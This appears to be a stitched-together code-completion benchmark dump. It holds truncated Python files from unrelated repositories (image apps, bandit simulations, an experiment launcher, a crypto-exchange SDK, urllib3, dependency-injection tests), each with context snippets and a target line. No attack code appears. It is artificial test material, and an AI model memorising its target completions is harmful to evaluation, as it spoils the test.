app.add_app("Image inpainting", inpaint.app)
app.add_app("Doc Scanner", stadap.app)
app.add_app("Add Title to image", textonimg.app)
app.add_app("Crop an Image", Crop.app)
app.add_app("Edge and Contour detection ", Edge_Cont.app) | app.add_app("Face detection", Face_detect.app) | 7 | 2023-12-20 20:32:16+00:00 | 2k |
DURUII/Replica-AUCB | main.py | [
{
"identifier": "StrategicArm",
"path": "arms.py",
"snippet": "class StrategicArm(NormalArm):\n c_min, c_max = 0.1, 1\n\n def __init__(self):\n # in the paper, r is expected reward\n r = random.uniform(0.1, 1)\n # to make that sample value is within 0~1 with 97%\n sigma = random.uniform(0, min(r / 3, (1 - r) / 3))\n super().__init__(r, sigma)\n\n # c for cost, b for bid, c_i = b_i according to the theorem 2\n self.c = random.uniform(0.1, 1)\n self.b = self.c"
},
{
"identifier": "Config",
"path": "config.py",
"snippet": "class Config:\n N = 60\n N_range = [50, 60, 70, 80, 90, 100]\n\n K = 20\n K_range = [10, 20, 30, 40, 50]\n\n B = 5e5\n B_range = [i * 10 for i in range(1, 11)]\n B_range = np.array(B_range) * 1e4\n\n line_styles = {\n 'AUCB': {'color': '#060506', 'marker': 's', 'label': 'AUCB'},\n 'optimal': {'color': '#ed1e25', 'marker': 'o', 'label': 'optimal'},\n 'separated': {'color': '#3753a4', 'marker': '^', 'label': 'separated'},\n '0.1-first': {'color': '#097f80', 'marker': 'v', 'label': '0.1-first'},\n '0.5-first': {'color': '#ba529e', 'marker': '<', 'label': '0.5-first'},\n }\n\n # bar style\n bar_width = 0.15\n bar_styles = {\n 'AUCB': {'color': '#060506', 'label': 'AUCB', 'hatch': ''},\n 'optimal': {'color': '#ed1e25', 'label': 'optimal', 'hatch': '||||'},\n 'separated': {'color': '#3753a4', 'label': 'separated', 'hatch': '/////'},\n '0.1-first': {'color': '#097f80', 'label': '0.1-first', 'hatch': '\\\\\\\\\\\\\\\\\\\\'},\n '0.5-first': {'color': '#ba529e', 'label': '0.5-first', 'hatch': '---'},\n }"
},
{
"identifier": "Emulator",
"path": "emulator.py",
"snippet": "class Emulator:\n algorithms = ['AUCB', 'optimal', 'separated', '0.1-first', '0.5-first']\n\n def __init__(self, arms: list[StrategicArm] = None, n_arms: int = 60, n_selected: int = 20, budget: float = 5e5):\n self.N = n_arms\n self.K = n_selected\n self.B = budget\n\n self.arms = arms\n if arms is None:\n self.arms = [StrategicArm() for _ in range(self.N)]\n\n self.name2sol = {}\n\n def build(self):\n for algo in Emulator.algorithms:\n if algo == 'AUCB':\n self.name2sol[algo] = AUCB(self.arms, self.N, self.K, self.B)\n elif algo == 'optimal':\n self.name2sol[algo] = Opt(self.arms, self.N, self.K, self.B)\n elif algo == 'separated':\n self.name2sol[algo] = Separated(self.arms, self.N, self.K, self.B)\n elif algo.endswith('-first'):\n self.name2sol[algo] = EpsilonFirst(self.arms, self.N, self.K, self.B, float(algo[:-6]))\n\n def simulate(self):\n self.build()\n name2res = {name: None for name in self.name2sol.keys()}\n for name in name2res.keys():\n # instance of an algorithm\n solver = self.name2sol[name]\n solver.initialize()\n name2res[name] = solver.run()\n return name2res"
}
] | import os
import pandas as pd
import numpy as np
import pickle
from matplotlib import pyplot as plt
from tqdm import tqdm
from arms import StrategicArm
from config import Config
from emulator import Emulator | 1,153 | """
Author: DURUII
Date: 2023/12/17
"""
plt.style.use(['science', 'grid'])
config = Config
# data preparation
if not os.path.exists('./runs.pkl'):
data = []
for X in ['N', 'K', 'B']:
for x in tqdm(eval(f'config.{X}_range'), desc=X):
if X == 'N':
| """
Author: DURUII
Date: 2023/12/17
"""
plt.style.use(['science', 'grid'])
config = Config
# data preparation
if not os.path.exists('./runs.pkl'):
data = []
for X in ['N', 'K', 'B']:
for x in tqdm(eval(f'config.{X}_range'), desc=X):
if X == 'N': | name2res = Emulator(n_arms=x).simulate() | 2 | 2023-12-15 18:17:01+00:00 | 2k |
XLearning-SCU/2023-TPAMI-SMILE | _AutoLauncher.py | [
{
"identifier": "path_operator",
"path": "_MainLauncher.py",
"snippet": "def get_settings():\r\ndef clear_gpu_fail(root):\r\ndef run():\r\ndef main():\r"
},
{
"identifier": "Launcher",
"path": "_Utils/Launcher.py",
"snippet": "class Launcher(SubprocessOperator):\r\n def __init__(self, path_operator, env_config='', queue=None):\r\n self.path_operator = path_operator\r\n self.env_config = env_config\r\n self.queue = queue\r\n\r\n def show_tensorboard(self, path_to_runs):\r\n python_path = self.path_operator.python_path\r\n tensorboard_path = os.path.join(os.path.dirname(python_path), 'tensorboard')\r\n # self.__call__(cmd='find \\'{}\\' | grep tfevents'.format(path_to_runs))\r\n # self.__call__(cmd='{} {} --inspect --logdir \\'{}\\''.format(python_path, tensorboard_path, path_to_runs))\r\n self.__call__(cmd='{} {} --logdir \\'{}\\' {}'.format(\r\n python_path, tensorboard_path, path_to_runs, self.path_operator.tensorboard_arg))\r\n\r\n def launch(self, cfg, run_file=\"main.py\", safe_mode=True, model_name='Train', clean_fold=True):\r\n fold_path = self.path_operator.get_code_path(code_fold_name=cfg.get_name(), level=3)\r\n if os.path.exists(os.path.join(fold_path, 'Checkpoints')):\r\n warnings.warn('There are some checkpoints in \"{}\".'.format(fold_path))\r\n if clean_fold:\r\n DirectoryOperator.FoldOperator(directory=fold_path).clear(delete_root=False, not_to_delete_file=safe_mode)\r\n code_root = os.path.join(fold_path, '{}Code'.format(model_name))\r\n # if sys.platform != 'win32':\r\n # code_root = '\"{}\"'.format(code_root)\r\n DirectoryOperator.FoldOperator(directory='./').copy(\r\n dst_fold=code_root, not_to_delete_file=safe_mode, ignore=ignore_patterns('__pycache__', '.idea', '_bac'))\r\n python_cmd = '{} -u {} {}'.format(\r\n self.path_operator.python_path,\r\n # np.random.randint(0,1000),\r\n run_file,\r\n cfg.get_config(),\r\n )\r\n txt_path = '\"{:}.txt\"'.format(os.path.join(fold_path, model_name))\r\n if sys.platform != 'win32':\r\n py_cmd = \"{append_config:} nohup {python_cmd:} > {txt_path:} 2>&1 &\".format(\r\n append_config=self.env_config + ' CUDA_VISIBLE_DEVICES={}'.format(cfg.cuda),\r\n python_cmd=python_cmd,\r\n txt_path=txt_path,\r\n )\r\n else:\r\n py_cmd = \"start /b {python_cmd:} > {txt_path:} 2>&1\".format(\r\n python_cmd=python_cmd,\r\n txt_path=txt_path,\r\n )\r\n self.__call__(\r\n cmd=\"cd \\\"{code_root:}\\\" && {py_cmd:}\".format(\r\n code_root=code_root,\r\n py_cmd=py_cmd,\r\n )\r\n )\r\n\r\n def quick_launch(self, settings, config_operator, **kwargs):\r\n \"\"\"\r\n settings: [cuda, [yaml_list], arg_dict]\r\n \"\"\"\r\n timer = Timer()\r\n total_count = len(settings)\r\n for cuda, yaml_list, arg_dict in settings:\r\n t_start = time.time()\r\n cfg = config_operator(\r\n yaml_list=yaml_list,\r\n cuda=cuda,\r\n **arg_dict,\r\n )\r\n work_root = self.path_operator.get_code_path(code_fold_name=cfg.get_name(), level=3)\r\n if os.path.exists(work_root):\r\n print(\"Skipping a code running due to its log already exists. work_root == {}\".format(work_root))\r\n total_count -= 1\r\n continue\r\n if self.queue is not None:\r\n self.queue.enqueue(work_root=work_root, cuda=cuda)\r\n self.launch(\r\n cfg=cfg,\r\n **kwargs\r\n )\r\n timer.update(time.time()-t_start)\r\n timer.count -= 1\r\n timer.show(total_count=total_count)\r\n timer.count += 1\r\n if self.queue is not None:\r\n self.queue.close()\r"
},
{
"identifier": "ConfigOperator",
"path": "_Utils/ConfigOperator.py",
"snippet": "class ConfigOperator:\r\n def __init__(self, cuda, yaml_list=None, **kwargs):\r\n self.config = EasyDict()\r\n self.cuda = cuda\r\n if yaml_list is not None:\r\n for yaml_path in yaml_list:\r\n with open(yaml_path, 'r') as stream:\r\n config = yaml.safe_load(stream)\r\n self.add_kwargs(**config)\r\n self.add_kwargs(**kwargs)\r\n self.config = EasyDict(dict(sorted(self.config.items())))\r\n\r\n def add_kwargs(self, **kwargs):\r\n for k, v in kwargs.items():\r\n if v == '':\r\n continue\r\n self.config[k] = v\r\n\r\n def get_config(self, for_path=False, *args, **kwargs):\r\n config = ''\r\n for k, val in self.config.items():\r\n if isinstance(val, bool):\r\n if val:\r\n config += ' --{}'.format(k)\r\n elif isinstance(val, str) and (len(val.split('\\\\')) > 1 or len(val.split('/')) > 1):\r\n if for_path:\r\n config += ' --{} {}'.format(\r\n k,\r\n os.path.join(*val.replace('\\\\', '/').split('/')[-1:]).replace('/', '@')[:8],\r\n )\r\n else:\r\n config += ' --{} \\\"{}\\\"'.format(k, val)\r\n else:\r\n config += ' --{} {}'.format(k, val)\r\n return config\r\n\r\n def get_name(self, *args, **kwargs):\r\n return \"{}\".format(self.get_config(for_path=True))\r\n\r\n def show_config(self):\r\n print(self.config)\r\n # print(self.config.setup)\r\n # print(self.config.backbone)\r\n # print(self.config.model_kwargs)\r\n # print(self.config.model_kwargs.head)\r"
}
] | import time
from _MainLauncher import path_operator
from _Utils import Launcher
from _Utils.ConfigOperator import ConfigOperator
| 1,420 |
def main():
class C2(ConfigOperator):
def get_name(self, *args, **kwargs):
return '_QueueLog'
|
def main():
class C2(ConfigOperator):
def get_name(self, *args, **kwargs):
return '_QueueLog'
| Launcher.Launcher(
| 1 | 2023-12-21 08:50:36+00:00 | 2k |
precisionalgorithms/loopring-python-SDK | main.py | [
{
"identifier": "Session",
"path": "loopring/session.py",
"snippet": "class Session:\n \"\"\"\n Parent class for Loopring API.\n \"\"\"\n # Class variables\n api_key = None\n account_id = None\n headers = None\n base_url = 'https://api3.loopring.io/api/v3'\n\n @classmethod\n def initialize(cls):\n \"\"\"\n Initialize the Loopring API with API key and account ID.\n \"\"\"\n load_dotenv()\n cls.api_key = os.environ.get(\"API_KEY\")\n cls.account_id = os.environ.get(\"ACCOUNT_ID\")\n cls.headers = {\n 'Accept': 'application/json',\n 'X-API-KEY': cls.api_key\n }"
},
{
"identifier": "Account",
"path": "loopring/account.py",
"snippet": "class Account(Session):\n\n def get_account_balances(\n self,\n address: str = \"\",\n tokens: str = \"\"\n ) -> list[Balance]:\n \"\"\"\n Get the balances for the account associated with the API key.\n\n :param address: Address of the account to fetch balances for.\n :param tokens: List of token IDs to fetch balances for.\n\n :return: Dataclass.\n \"\"\"\n url = (f'{self.base_url}/user/balances?accountId={self.account_id}'\n f'&address={address}&tokens={tokens}')\n\n response = requests.get(url, headers=self.headers)\n\n if response.status_code == 200:\n data = response.json()\n return [Balance(**entry) for entry in data]\n else:\n print(\"Error fetching account balance:\", response.status_code)\n return response.json()"
},
{
"identifier": "Exchange",
"path": "loopring/exchange.py",
"snippet": "class Exchange(Session):\n\n def get_tokens(self) -> list[TokenInfo]:\n \"\"\"\n Get the tokens supported by the Loopring protocol.\n\n :return: List of tokens.\n \"\"\"\n url = f'{self.base_url}/exchange/tokens'\n\n response = requests.get(url, headers=self.headers)\n\n if response.status_code == 200:\n data = response.json()\n return [TokenInfo(**entry) for entry in data]\n else:\n print(\"Error fetching tokens:\", response.status_code)\n return response.json()\n\n def get_exchange_info(self) -> ExchangeInfo:\n \"\"\"\n Get the exchange info.\n\n :return: Exchange Info.\n \"\"\"\n url = f'{self.base_url}/exchange/info'\n\n response = requests.get(url, headers=self.headers)\n\n if response.status_code == 200:\n data = response.json()\n return ExchangeInfo(**data)\n else:\n print(\"Error fetching tokens:\", response.status_code)\n return response.json()\n\n def get_markets(self) -> list[MarketInfo]:\n \"\"\"\n Get the markets supported by the Loopring protocol.\n\n :return: List of markets.\n \"\"\"\n url = f'{self.base_url}/exchange/markets'\n\n response = requests.get(url, headers=self.headers)\n\n if response.status_code == 200:\n data = response.json()\n return [MarketInfo(**entry) for entry in data['markets']]\n else:\n print(\"Error fetching markets:\", response.status_code)\n return response.json()"
},
{
"identifier": "join_balance_with_token_info",
"path": "utils.py",
"snippet": "def join_balance_with_token_info(\n balances: List[Balance],\n tokens: List[TokenInfo]\n) -> list[DetailedBalance]:\n \"\"\"\n Join the Balance dataclass with the TokenInfo dataclass.\n \"\"\"\n token_info_map = {token.tokenId: token for token in tokens}\n joined_data = []\n for balance in balances:\n token_info = token_info_map.get(balance.tokenId)\n if token_info:\n combined_data = {\n 'accountId': balance.accountId,\n 'tokenId': balance.tokenId,\n 'total': balance.total,\n 'converted_total': convert_from_wei(balance.total, token_info.decimals),\n 'locked': balance.locked,\n 'pending': balance.pending,\n 'symbol': token_info.symbol,\n 'name': token_info.name,\n 'address': token_info.address,\n 'decimals': token_info.decimals\n\n }\n joined_data.append(combined_data)\n\n return [DetailedBalance(**entry) for entry in joined_data]"
}
] | import pickle
from loopring.session import Session
from loopring.account import Account
from loopring.exchange import Exchange
from utils import join_balance_with_token_info | 1,087 |
# Initialize the Loopring API with API key and account ID
Session.initialize()
# Get the account balances
account = Account()
balances = account.get_account_balances()
# Get token info on exchange
|
# Initialize the Loopring API with API key and account ID
Session.initialize()
# Get the account balances
account = Account()
balances = account.get_account_balances()
# Get token info on exchange | exchange = Exchange() | 2 | 2023-12-18 00:19:56+00:00 | 2k |
Liyulingyue/ModulelyTools | codes/extraction/ModuleTools.py | [
{
"identifier": "parse_ipynb",
"path": "codes/extraction/ipynb/ipynb_analyse.py",
"snippet": "def parse_ipynb(file_path):\n \"\"\"\n # 示例:使用函数解析一个ipynb文件\n file_path = 'main.ipynb' # 请将此处替换为您的ipynb文件路径\n result = parse_ipynb(file_path)\n print(result)\n \"\"\"\n # 读取ipynb文件\n with open(file_path, 'r', encoding='utf-8') as f:\n nb = nbformat.read(f, as_version=4)\n\n # 初始化结果列表\n parsed_cells = []\n\n # 对每一个cell进行处理\n for cell in nb.cells:\n cell_dict = {}\n if cell.cell_type == 'markdown':\n cell_dict['属性'] = 'Markdown'\n cell_dict['内容'] = cell.source\n cell_dict['输出'] = ''\n elif cell.cell_type == 'code':\n cell_dict['属性'] = 'Code'\n cell_dict['内容'] = cell.source\n cell_dict['输出'] = ''\n else:\n raise ValueError(f\"Unsupported cell type: {cell.cell_type}\")\n parsed_cells.append(cell_dict)\n return parsed_cells"
},
{
"identifier": "get_ipynb_content",
"path": "codes/extraction/ipynb/ipynb_analyse.py",
"snippet": "def get_ipynb_content(parsed_cells):\n ipynb_content = \"\"\n\n for i in range(len(parsed_cells)):\n if parsed_cells[i]['属性'] == \"Code\":\n ipynb_content += f\"[Cell No. {i}]\\n {parsed_cells[i]['内容']}\\n\\n\"\n\n return ipynb_content"
},
{
"identifier": "get_model_list",
"path": "codes/extraction/ipynb/ipynb_analyse.py",
"snippet": "def get_model_list(ipynb_content, llm):\n prompt = \\\nf\"\"\" \n我将给你一些NoteBook中的测试代码,请你阅读这些代码,并根据代码内容进行架构设计,使用json格式返回设计结果。\nNoteBook中的代码是{ipynb_content}\nJson返回的内容格式为:\n{str('{')}\n\"模块\":list[dict{str('{')}\"Name\":str, \"Type\":str, \"Introduction\":str{str('}')}]\n{str('}')}\n“模块”信息是一个list,每个元素是一个字典,包括了模块名称,模块类型(取值为\"class\"或\"function\"),模块介绍\n\"\"\"\n json_data = llm.get_llm_json_answer(prompt)\n return json_data[\"模块\"]"
},
{
"identifier": "model_list2python",
"path": "codes/extraction/ipynb/ipynb_analyse.py",
"snippet": "def model_list2python(model_list, ipynb_content, llm):\n py_str = \"\"\n for model_dict in model_list:\n model_name = model_dict[\"Name\"]\n model_type = model_dict[\"Type\"]\n model_intro = model_dict[\"Introduction\"]\n\n prompt = \\\nf\"\"\" \n我将给你一个模块名称和模块类型,以及一些Notebook中的测试代码,并根据代码内容实现这个模块,使用json格式返回设计结果。\n模块名称是{model_name},请定义为一个{model_type},模块的功能是{model_intro},NoteBook中的代码是{ipynb_content}。\nJson返回的内容格式为:\n{str('{')}\n\"代码\":multi-lines str\n{str('}')}\n“代码”信息是一个多行字符串,内容是你根据NoteBook中的代码和模块的功能,对模块{model_name}的程序实现,请保证生成的代码可以直接运行,解释说明的内容采用注释标记。\n\"\"\"\n\n # model_impl = get_llm_json_answer(prompt)\n try:\n model_impl = llm.get_llm_json_answer(prompt)\n py_str += model_impl[\"代码\"]\n except:\n py_str += f\"# 模块{model_name},类型是{model_type},生成失败\"\n py_str += \"\\n\\n\"\n return py_str"
},
{
"identifier": "extract_function_defs",
"path": "codes/extraction/py/py_analyse.py",
"snippet": "def extract_function_defs(node, function_defs):\n if isinstance(node, ast.FunctionDef):\n function_source = ast.unparse(node)\n function_defs.append([node.name, function_source, [arg.arg for arg in node.args.args], ast.get_docstring(node)])\n elif isinstance(node, ast.ClassDef):\n function_source = ast.unparse(node)\n function_defs.append([node.name, function_source, [stmt.name for stmt in node.body if isinstance(stmt, ast.FunctionDef)], ast.get_docstring(node)])\n else:\n for child in ast.iter_child_nodes(node):\n extract_function_defs(child, function_defs)"
},
{
"identifier": "get_function_defs",
"path": "codes/extraction/py/py_analyse.py",
"snippet": "def get_function_defs(code):\n tree = ast.parse(code)\n function_defs = []\n extract_function_defs(tree, function_defs)\n return function_defs # a list, each element is [define of function/class, docstring]"
},
{
"identifier": "get_intro_of_fun",
"path": "codes/extraction/py/py_analyse.py",
"snippet": "def get_intro_of_fun(fun_str, llm):\n try:\n prompt = f\"\"\"\n 请帮我为这个函数或者类写一段说明介绍,并且以json的形式返回给我。\n 需要解读的函数或者类是{fun_str}\n Json返回的内容格式为:\n {str('{')}\"\n \"说明介绍\":str\n {str('}')}\n \"\"\"\n result = llm.get_llm_answer(prompt)\n try:\n json_dict = llm.extract_json_from_llm_answer(result)\n return json_dict[\"说明介绍\"]\n except:\n return result\n except:\n return \"输出失败\""
}
] | from .ipynb.ipynb_analyse import parse_ipynb, get_ipynb_content, get_model_list, model_list2python
from .py.py_analyse import extract_function_defs, get_function_defs, get_intro_of_fun
from ..llm.Ernie import Ernie
from ..llm.Ernie import Ernie | 1,554 |
class ModuleTools(object):
def __init__(self, llm_type="Ernie"):
super.__init__()
if llm_type=="Ernie":
self.llm = Ernie()
else: # default set ernie as used llm
self.llm = Ernie()
def ipynb2py(self, ipynb_path = "example.ipynb", prompt = ""):
|
class ModuleTools(object):
def __init__(self, llm_type="Ernie"):
super.__init__()
if llm_type=="Ernie":
self.llm = Ernie()
else: # default set ernie as used llm
self.llm = Ernie()
def ipynb2py(self, ipynb_path = "example.ipynb", prompt = ""): | result = parse_ipynb(ipynb_path) | 0 | 2023-12-17 14:20:45+00:00 | 2k |
Azure-Samples/functions-python-web-crawler | .venv/Lib/site-packages/urllib3/_base_connection.py | [
{
"identifier": "_TYPE_SOCKET_OPTIONS",
"path": ".venv/Lib/site-packages/urllib3/util/connection.py",
"snippet": "_TYPE_SOCKET_OPTIONS = typing.Sequence[typing.Tuple[int, int, typing.Union[int, bytes]]]"
},
{
"identifier": "_DEFAULT_TIMEOUT",
"path": ".venv/Lib/site-packages/urllib3/util/timeout.py",
"snippet": "_DEFAULT_TIMEOUT: Final[_TYPE_DEFAULT] = _TYPE_DEFAULT.token"
},
{
"identifier": "_TYPE_TIMEOUT",
"path": ".venv/Lib/site-packages/urllib3/util/timeout.py",
"snippet": "_TYPE_TIMEOUT = typing.Optional[typing.Union[float, _TYPE_DEFAULT]]"
},
{
"identifier": "Url",
"path": ".venv/Lib/site-packages/urllib3/util/url.py",
"snippet": "class Url(\n typing.NamedTuple(\n \"Url\",\n [\n (\"scheme\", typing.Optional[str]),\n (\"auth\", typing.Optional[str]),\n (\"host\", typing.Optional[str]),\n (\"port\", typing.Optional[int]),\n (\"path\", typing.Optional[str]),\n (\"query\", typing.Optional[str]),\n (\"fragment\", typing.Optional[str]),\n ],\n )\n):\n \"\"\"\n Data structure for representing an HTTP URL. Used as a return value for\n :func:`parse_url`. Both the scheme and host are normalized as they are\n both case-insensitive according to RFC 3986.\n \"\"\"\n\n def __new__( # type: ignore[no-untyped-def]\n cls,\n scheme: str | None = None,\n auth: str | None = None,\n host: str | None = None,\n port: int | None = None,\n path: str | None = None,\n query: str | None = None,\n fragment: str | None = None,\n ):\n if path and not path.startswith(\"/\"):\n path = \"/\" + path\n if scheme is not None:\n scheme = scheme.lower()\n return super().__new__(cls, scheme, auth, host, port, path, query, fragment)\n\n @property\n def hostname(self) -> str | None:\n \"\"\"For backwards-compatibility with urlparse. We're nice like that.\"\"\"\n return self.host\n\n @property\n def request_uri(self) -> str:\n \"\"\"Absolute path including the query string.\"\"\"\n uri = self.path or \"/\"\n\n if self.query is not None:\n uri += \"?\" + self.query\n\n return uri\n\n @property\n def authority(self) -> str | None:\n \"\"\"\n Authority component as defined in RFC 3986 3.2.\n This includes userinfo (auth), host and port.\n\n i.e.\n userinfo@host:port\n \"\"\"\n userinfo = self.auth\n netloc = self.netloc\n if netloc is None or userinfo is None:\n return netloc\n else:\n return f\"{userinfo}@{netloc}\"\n\n @property\n def netloc(self) -> str | None:\n \"\"\"\n Network location including host and port.\n\n If you need the equivalent of urllib.parse's ``netloc``,\n use the ``authority`` property instead.\n \"\"\"\n if self.host is None:\n return None\n if self.port:\n return f\"{self.host}:{self.port}\"\n return self.host\n\n @property\n def url(self) -> str:\n \"\"\"\n Convert self into a url\n\n This function should more or less round-trip with :func:`.parse_url`. The\n returned url may not be exactly the same as the url inputted to\n :func:`.parse_url`, but it should be equivalent by the RFC (e.g., urls\n with a blank port will have : removed).\n\n Example:\n\n .. code-block:: python\n\n import urllib3\n\n U = urllib3.util.parse_url(\"https://google.com/mail/\")\n\n print(U.url)\n # \"https://google.com/mail/\"\n\n print( urllib3.util.Url(\"https\", \"username:password\",\n \"host.com\", 80, \"/path\", \"query\", \"fragment\"\n ).url\n )\n # \"https://username:[email protected]:80/path?query#fragment\"\n \"\"\"\n scheme, auth, host, port, path, query, fragment = self\n url = \"\"\n\n # We use \"is not None\" we want things to happen with empty strings (or 0 port)\n if scheme is not None:\n url += scheme + \"://\"\n if auth is not None:\n url += auth + \"@\"\n if host is not None:\n url += host\n if port is not None:\n url += \":\" + str(port)\n if path is not None:\n url += path\n if query is not None:\n url += \"?\" + query\n if fragment is not None:\n url += \"#\" + fragment\n\n return url\n\n def __str__(self) -> str:\n return self.url"
}
] | import typing
import ssl
from .util.connection import _TYPE_SOCKET_OPTIONS
from .util.timeout import _DEFAULT_TIMEOUT, _TYPE_TIMEOUT
from .util.url import Url
from typing import Literal, Protocol
from .response import BaseHTTPResponse | 1,468 | from __future__ import annotations
_TYPE_BODY = typing.Union[bytes, typing.IO[typing.Any], typing.Iterable[bytes], str]
class ProxyConfig(typing.NamedTuple):
ssl_context: ssl.SSLContext | None
use_forwarding_for_https: bool
assert_hostname: None | str | Literal[False]
assert_fingerprint: str | None
class _ResponseOptions(typing.NamedTuple):
# TODO: Remove this in favor of a better
# HTTP request/response lifecycle tracking.
request_method: str
request_url: str
preload_content: bool
decode_content: bool
enforce_content_length: bool
if typing.TYPE_CHECKING:
class BaseHTTPConnection(Protocol):
default_port: typing.ClassVar[int]
default_socket_options: typing.ClassVar[_TYPE_SOCKET_OPTIONS]
host: str
port: int
timeout: None | (
float
) # Instance doesn't store _DEFAULT_TIMEOUT, must be resolved.
blocksize: int
source_address: tuple[str, int] | None
socket_options: _TYPE_SOCKET_OPTIONS | None
| from __future__ import annotations
_TYPE_BODY = typing.Union[bytes, typing.IO[typing.Any], typing.Iterable[bytes], str]
class ProxyConfig(typing.NamedTuple):
ssl_context: ssl.SSLContext | None
use_forwarding_for_https: bool
assert_hostname: None | str | Literal[False]
assert_fingerprint: str | None
class _ResponseOptions(typing.NamedTuple):
# TODO: Remove this in favor of a better
# HTTP request/response lifecycle tracking.
request_method: str
request_url: str
preload_content: bool
decode_content: bool
enforce_content_length: bool
if typing.TYPE_CHECKING:
class BaseHTTPConnection(Protocol):
default_port: typing.ClassVar[int]
default_socket_options: typing.ClassVar[_TYPE_SOCKET_OPTIONS]
host: str
port: int
timeout: None | (
float
) # Instance doesn't store _DEFAULT_TIMEOUT, must be resolved.
blocksize: int
source_address: tuple[str, int] | None
socket_options: _TYPE_SOCKET_OPTIONS | None
| proxy: Url | None | 3 | 2023-12-16 04:12:01+00:00 | 2k |
neuroglia-io/python-framework | tests/cases/test_service_provider.py | [
{
"identifier": "FileLogger",
"path": "tests/services.py",
"snippet": "class FileLogger(LoggerBase):\n \n def log(text: str):\n with open('example.txt', 'a') as file:\n file.write(f'{text}\\n')"
},
{
"identifier": "LoggerBase",
"path": "tests/services.py",
"snippet": "class LoggerBase(ABC):\n \n @abstractclassmethod\n def log(text: str):\n raise NotImplementedError()"
},
{
"identifier": "NullLogger",
"path": "tests/services.py",
"snippet": "class NullLogger(LoggerBase):\n \n def log(text: str):\n pass"
},
{
"identifier": "PrintLogger",
"path": "tests/services.py",
"snippet": "class PrintLogger(LoggerBase):\n \n def log(text: str):\n print(text)"
}
] | from re import T
from sys import implementation
from neuroglia.dependency_injection.service_provider import IServiceProvider, ServiceCollection, ServiceProvider
from tests.services import FileLogger, LoggerBase, NullLogger, PrintLogger
import pytest | 820 |
class TestServiceProvider:
def test_build_should_work(self):
#arrange
services = ServiceCollection()
services.add_singleton(LoggerBase, PrintLogger)
services.add_singleton(LoggerBase, singleton = FileLogger())
services.add_singleton(LoggerBase, implementation_factory = self._build_null_logger)
#act
service_provider = services.build()
#assert
assert service_provider is not None, 'service_provider is none'
def test_get_service_should_work(self):
#arrange
services = ServiceCollection()
implementation_type = PrintLogger
services.add_singleton(LoggerBase, implementation_type)
service_provider = services.build()
#act
logger = service_provider.get_service(LoggerBase)
#assert
assert logger is not None, 'logger is none'
assert isinstance(logger, implementation_type), f"logger is not of expected type '{implementation_type.__name__}'"
def test_get_unregistered_service_should_work(self):
#arrange
services = ServiceCollection()
service_provider = services.build()
#act
logger = service_provider.get_service(LoggerBase)
#assert
assert logger is None, 'logger is not none'
def test_get_required_service_should_work(self):
#arrange
services = ServiceCollection()
implementation_type = PrintLogger
services.add_singleton(LoggerBase, implementation_type)
service_provider = services.build()
#act
logger = service_provider.get_required_service(LoggerBase)
#assert
assert logger is not None, 'logger is none'
assert isinstance(logger, implementation_type), f"logger is not of expected type '{implementation_type.__name__}'"
def test_get_required_unregistered_service_should_raise_error(self):
#arrange
services = ServiceCollection()
service_provider = services.build()
#assert
with pytest.raises(Exception):
service_provider.get_required_service(LoggerBase)()
def test_get_scoped_service_from_root_should_raise_error(self):
#arrange
services = ServiceCollection()
implementation_type = PrintLogger
services.add_scoped(LoggerBase, implementation_type)
service_provider = services.build()
#assert
with pytest.raises(Exception):
service_provider.get_required_service(LoggerBase)()
def test_get_services_should_work(self):
#arrange
services = ServiceCollection()
services.add_singleton(LoggerBase, PrintLogger)
services.add_singleton(LoggerBase, singleton = FileLogger())
services.add_singleton(LoggerBase, implementation_factory = self._build_null_logger)
service_provider = services.build()
#act
loggers = service_provider.get_services(LoggerBase)
#assert
assert len(loggers) == 3, f'expected 3 loggers, got {len(loggers)}'
def test_create_scope_should_work(self):
pass
def test_get_scoped_service_should_work(self):
pass
|
class TestServiceProvider:
def test_build_should_work(self):
#arrange
services = ServiceCollection()
services.add_singleton(LoggerBase, PrintLogger)
services.add_singleton(LoggerBase, singleton = FileLogger())
services.add_singleton(LoggerBase, implementation_factory = self._build_null_logger)
#act
service_provider = services.build()
#assert
assert service_provider is not None, 'service_provider is none'
def test_get_service_should_work(self):
#arrange
services = ServiceCollection()
implementation_type = PrintLogger
services.add_singleton(LoggerBase, implementation_type)
service_provider = services.build()
#act
logger = service_provider.get_service(LoggerBase)
#assert
assert logger is not None, 'logger is none'
assert isinstance(logger, implementation_type), f"logger is not of expected type '{implementation_type.__name__}'"
def test_get_unregistered_service_should_work(self):
#arrange
services = ServiceCollection()
service_provider = services.build()
#act
logger = service_provider.get_service(LoggerBase)
#assert
assert logger is None, 'logger is not none'
def test_get_required_service_should_work(self):
#arrange
services = ServiceCollection()
implementation_type = PrintLogger
services.add_singleton(LoggerBase, implementation_type)
service_provider = services.build()
#act
logger = service_provider.get_required_service(LoggerBase)
#assert
assert logger is not None, 'logger is none'
assert isinstance(logger, implementation_type), f"logger is not of expected type '{implementation_type.__name__}'"
def test_get_required_unregistered_service_should_raise_error(self):
#arrange
services = ServiceCollection()
service_provider = services.build()
#assert
with pytest.raises(Exception):
service_provider.get_required_service(LoggerBase)()
def test_get_scoped_service_from_root_should_raise_error(self):
#arrange
services = ServiceCollection()
implementation_type = PrintLogger
services.add_scoped(LoggerBase, implementation_type)
service_provider = services.build()
#assert
with pytest.raises(Exception):
service_provider.get_required_service(LoggerBase)()
def test_get_services_should_work(self):
#arrange
services = ServiceCollection()
services.add_singleton(LoggerBase, PrintLogger)
services.add_singleton(LoggerBase, singleton = FileLogger())
services.add_singleton(LoggerBase, implementation_factory = self._build_null_logger)
service_provider = services.build()
#act
loggers = service_provider.get_services(LoggerBase)
#assert
assert len(loggers) == 3, f'expected 3 loggers, got {len(loggers)}'
def test_create_scope_should_work(self):
pass
def test_get_scoped_service_should_work(self):
pass
| def _build_null_logger(self, provider : IServiceProvider) -> NullLogger: return NullLogger() | 2 | 2023-12-15 14:36:50+00:00 | 2k |
Vlodson/Faculty-Choice-Assistant | backend/server/endpoints/natural_language.py | [
{
"identifier": "make_thread_for_user",
"path": "backend/llm/threads.py",
"snippet": "def make_thread_for_user() -> Thread:\n return CLIENT.beta.threads.create()"
},
{
"identifier": "retrieve_thread_for_user",
"path": "backend/llm/threads.py",
"snippet": "def retrieve_thread_for_user(thread_id: str) -> Thread:\n return CLIENT.beta.threads.retrieve(thread_id=thread_id)"
},
{
"identifier": "send_setup_message",
"path": "backend/llm/threads.py",
